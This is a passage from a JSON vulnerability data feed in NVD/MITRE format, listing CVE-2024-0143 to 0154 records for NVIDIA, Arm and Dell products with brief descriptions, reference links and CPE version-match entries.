"https://nvidia.custhelp.com/app/answers/detail/a_id/5596", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5596", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2095", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2095", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA nvJPEG2000 library contains a vulnerability where an attacker can cause an out-of-bounds write issue by means of a specially crafted JPEG2000 file. A successful exploit of this vulnerability might lead to code execution and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-12T01:15Z", "lastModifiedDate" : "2025-02-12T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0144", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5596", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5596", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2108", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2108", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2113", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2113", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA nvJPEG2000 library contains a vulnerability where an attacker can cause a buffer overflow issue by means of a specially crafted JPEG2000 file. A successful exploit of this vulnerability might lead to data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-12T01:15Z", "lastModifiedDate" : "2025-02-12T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0145", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5596", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5596", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2108", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2108", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2113", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2113", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA nvJPEG2000 library contains a vulnerability where an attacker can cause a heap-based buffer overflow issue by means of a specially crafted JPEG2000 file. A successful exploit of this vulnerability might lead to code execution and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-12T01:15Z", "lastModifiedDate" : "2025-02-12T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0146", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-120" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where a malicious guest could cause memory corruption. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, or data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-28T04:15Z", "lastModifiedDate" : "2025-01-28T04:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0147", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU display driver for Windows and Linux contains a vulnerability where referencing memory after it has been freed can lead to denial of service or data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-28T04:15Z", "lastModifiedDate" : "2025-01-28T04:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0148", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-447" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5617", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5617", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Jetson Linux and IGX OS image contains a vulnerability in the UEFI firmware RCM boot mode, where an unprivileged attacker with physical access to the device could load untrusted code. A successful exploit might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure. The scope of the impacts can extend to other components." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-25T21:15Z", "lastModifiedDate" : "2025-02-25T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0149", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "http://www.openwall.com/lists/oss-security/2025/03/27/7", "name" : "http://www.openwall.com/lists/oss-security/2025/03/27/7", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Linux contains a vulnerability which could allow an attacker unauthorized access to files. A successful exploit of this vulnerability might lead to limited information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-28T04:15Z", "lastModifiedDate" : "2025-03-27T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0150", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU display driver for Windows and Linux contains a vulnerability where data is written past the end or before the beginning of a buffer. A successful exploit of this vulnerability might lead to information disclosure, denial of service, or data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-28T04:15Z", "lastModifiedDate" : "2025-01-28T04:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0151", "ASSIGNER" : "arm-security@arm.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://developer.arm.com/Arm%20Security%20Center/Cortex-M%20Security%20Extensions", "name" : "https://developer.arm.com/Arm%20Security%20Center/Cortex-M%20Security%20Extensions", "refsource" : "", "tags" : [ ] }, { "url" : "https://developer.arm.com/Arm%20Security%20Center/Cortex-M%20Security%20Extensions", "name" : "https://developer.arm.com/Arm%20Security%20Center/Cortex-M%20Security%20Extensions", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Insufficient argument checking in Secure state Entry functions in software using Cortex-M Security Extensions (CMSE), that has been compiled using toolchains that implement 'Arm v8-M Security Extensions Requirements on Development Tools' prior to version 1.4, allows an attacker to pass values to Secure state that are out of range for types smaller than 32-bits. Out of range values might lead to incorrect operations in secure state." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-24T18:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0153", "ASSIGNER" : "arm-security@arm.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-119" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities", "name" : "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities", "name" : "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Arm Ltd Valhall GPU Firmware, Arm Ltd Arm 5th Gen GPU Architecture Firmware allows a local non-privileged user to make improper GPU processing operations to access a limited amount outside of buffer bounds. If the operations are carefully prepared, then this in turn could give them access to all system memory. This issue affects Valhall GPU Firmware: from r29p0 through r46p0; Arm 5th Gen GPU Architecture Firmware: from r41p0 through r46p0." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:arm:5th_gen_gpu_architecture_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding" : "r41p0", "versionEndExcluding" : "r47p0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:arm:valhall_gpu_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding" : "r29p0", "versionEndExcluding" : "r47p0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-07-01T09:15Z", "lastModifiedDate" : "2025-03-27T17:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0154", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-125" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper parameter initialization vulnerability. A local low privileged attacker could potentially exploit this vulnerability to read the contents of non-SMM stack memory." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx760c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx760c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r860_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r860:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r960_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r960:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t560_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t560:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9680_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9680:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8610t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8610t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8620t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8620t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr7620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr7620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx750c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx750c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : 